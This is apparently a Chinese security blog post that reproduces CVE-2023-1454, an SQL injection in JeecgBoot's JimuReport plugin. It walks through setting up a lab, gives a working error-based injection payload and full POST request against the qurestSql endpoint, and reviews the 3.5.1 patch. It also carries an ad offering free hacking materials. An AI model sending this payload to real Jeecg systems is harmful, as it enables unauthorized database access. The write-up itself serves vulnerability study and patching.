首页 > 其他分享 >CVE-2023-1454注入分析复现

CVE-2023-1454注入分析复现

时间:2023-07-17 17:47:35浏览次数:44  
标签:zh like 2023 yarn 1454 jeecgboot 网安 CVE jeecg

简介

JeecgBoot的代码生成器是一种可以帮助开发者快速构建企业级应用的工具,它可以通过一键生成前后端代码,无需写任何代码,让开发者更多关注业务逻辑。

影响版本

Jeecg-Boot<=3.5.1

环境搭建

idea+

后端源码:

https://github.com/jeecgboot/jeecg-boot/archive/refs/tags/v3.5.0.zip

前端源码:

https://github.com/jeecgboot/jeecgboot-vue3/archive/refs/tags/v3.5.0.zip

安装npm,安装nodejs

https://nodejs.org/dist/v18.16.1/node-v18.16.1-x64.msi

image-20230630100857383

image-20230630100954115

安装yarn

npm install -g yarn

image-20230630102534163

下载依赖

yarn install
yarn run serve  //起服务

image-20230630134805017

由于是前后端分离,需要数据库导入表,使用navicat直接导入即可

image-20230630134749348

后端服务端搭建,使用idea搭建导入项目,修改数据库配置

image-20230711102654282

配置server端npm服务

image-20230711102503802

配置好之后直接启动,访问

http://localhost:3100/login

image-20230711132237314

搭建成功

【----帮助网安学习,以下所有学习资料免费领!加vx:yj009991,备注 “博客园” 获取!】

 ① 网安学习成长路径思维导图
 ② 60+网安经典常用工具包
 ③ 100+SRC漏洞分析报告
 ④ 150+网安攻防实战技术电子书
 ⑤ 最权威CISSP 认证考试指南+题库
 ⑥ 超1800页CTF实战技巧手册
 ⑦ 最新网安大厂面试题合集(含答案)
 ⑧ APP客户端安全检测指南(安卓+IOS)

漏洞复现

前后端分离,后端端口8080 ,Payload:

{"apiSelectId":"1316997232402231298","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '"}
POST /jeecg-boot/jmreport/qurestSql HTTP/1.1
Host: localhost:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/115.0
Content-Type: application/json
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Length: 128
​
{"apiSelectId":"1316997232402231298","id":"1' or '%1%' like (updatexml(0x3a,concat(1,(select current_user)),1)) or '%%' like '"}

image-20230711135427631

分析

漏洞产生点位于积木报表插件内,查看更新的3.5.1的版本更新

image-20230711132911295

更改了72处的文件,其中需要注意db/其他数据库/jeecgboot-sqlserver2019.sql中重写了数据插入的方法

jeecg-boot-base-core/src/main/java/org/jeecg/common/util/SqlInjectionUtil.java中增加了对sql语句的正则

image-20230711133319482

这个修复是针对于后端的SQL注入,/sys/duplicate/check

image-20230711135705607

目前最新更新的3.5.1版本似乎依旧没有针对积木报表注入点儿的加固措施,修复时更换jar包

image-20230711141329534

目前积木官方的jar包已升级。

关注积木5月份的升级日志

http://jimureport.com/doc/log

image-20230711141443739

小结

github上有师傅们的脚本,但是如果要批量使用的话建议在修改一下response的内容,仅仅只有操作失败的报错的话会存在大批量的报错。

image-20230711204157664

所有自定义的if判断的回显都建议修改一下,如有错误欢迎指出。

更多网安技能的在线实操练习,请点击这里>>

 

标签:zh,like,2023,yarn,1454,jeecgboot,网安,CVE,jeecg
From: https://www.cnblogs.com/hetianlab/p/17560744.html

相关文章

  • ON1 HDR 2023 - HDR图像处理mac软件
    ON1HDR2023是一款强大的高动态范围(HDR)图像处理软件,专为摄影师和图像爱好者设计。它提供了一系列功能和工具,使用户能够创建出令人惊叹的HDR照片。→→↓↓载ON1HDR2023mac版 强大的HDR合成:ON1HDR2023采用先进的图像处理算法,能够将多个曝光不同的照片(如曝光正常、曝......
  • ON1 Photo RAW 2023 - mac摄影RAW图像处理软件
    ON1PhotoRAW2023是一款功能强大的专业级照片编辑和管理软件,为摄影师提供了广泛的工具和功能,以实现他们的创意愿景。→→↓↓载ON1PhotoRAW2023mac版 简介和界面:ON1PhotoRAW2023是一款基于订阅模型的跨平台照片编辑软件,适用于Mac和Windows系统。它采用了直观的用......
  • SMU Summer 2023 Contest Round 4
    SMUSummer2023ContestRound4A.TelephoneNumber满足第一个8后面存在10个字符即可#include<bits/stdc++.h>#defineendl'\n'#defineintlonglongusingnamespacestd;intn,m;voidsolve(){cin>>n;strings;cin>>s;......
  • 2023/7/17
    今天主要了解了格式化字符串String类的静态format()方法用于创建格式化的字符串package格式化字符串;importjava.util.Date;publicclass日期和时间字符串格式化{publicstaticvoidmain(String[]args){Datedate=newDate();Stringa=Str......
  • 【2023.07.17】keeppley周杰伦DZ0157周同学积木评测
    前言本人是自费购买积木,购买原因是给妹妹培养动手能力,减少短视频占用时间,其次是给家里做摆饰,所以选择积木多考虑了美观非专业评测,如果想看更多积木评测请点进我的博客主页分类查看正文这次的说明书颜色真的印刷质量感觉不太好(单指颜色,拼装过程说明还是很不错的),颜色真的很杂......
  • 完美解码 最新版 2023.06.13
    因为完美解码官网的下载链接404了,所以给大家分享一下。完美解码是一款能实现各种流行视频、HDTV播放及编码的全能型影音解码包,自带MediaPlayerClassic、KMPlayer、PotPlayer三款流行播放器,支持简、英语言平台下安装,能播放AVI、VCD、DVD、MPG、MP4、RMVB、TS、TP、EVO、M2......
  • 【日记】2023.7.17入职第一天
    2023.7.17入职第一天新开的全新板块,记录自己的实习生活。由于是校企合作的企业,所以面试较为轻松,很顺利的面试到了市场部的产品组,职位是产品工程师,后面可能会比较忙。2023.7.17晴天早上七点半起来洗漱,八点二十出发步行十分钟就到了公司。第一件事就是先签合同,三份合同,新人第一......
  • 2023ACM暑期集训 DAY 3
    目前进度——动态规划1:线性dp、背包问题,区间好题1012[NOIP1999]拦截导弹前言本题不重要,重要的是关于伪单调栈求最长单调子序列的理解。伪单调栈求最长单调子序列的一些理解重点最终伪单调栈中的序列不一定是最长单调子序列。以最长上升子序列为例,解释操作的意图。若目前......
  • 2023.06月随笔、总结
    6月份的事情不算太多,主要有几点一个是gpm平台热门数据top20模块接入,没什么好说的就是对对接口,写写页面然后是crasheyeantd平台的移动端适配,这个问题其实我任务手机上看b端数据天然的有缺陷,屏幕太小了,展示不了多少信息,但没办法,有人需要,那我就尝试适配,中间大部分使用了媒体查询......
  • 2023.7.16小结
    依旧是开头的碎碎念今天是正式的回学校学习的日子啦,去了if楼写代码,唔比家里要舒服的多(主要是喜欢这个屏幕);花了好几天的时间收拾家呜呜呜累洗掉了啦,今晚还有个cf...大概会掉分叭哭哭,感觉一朝回到解放前,昨晚思考了一下今天学些什么,发现基本上都不会啦(喜报:都不会啦)那还能怎么办呢,只......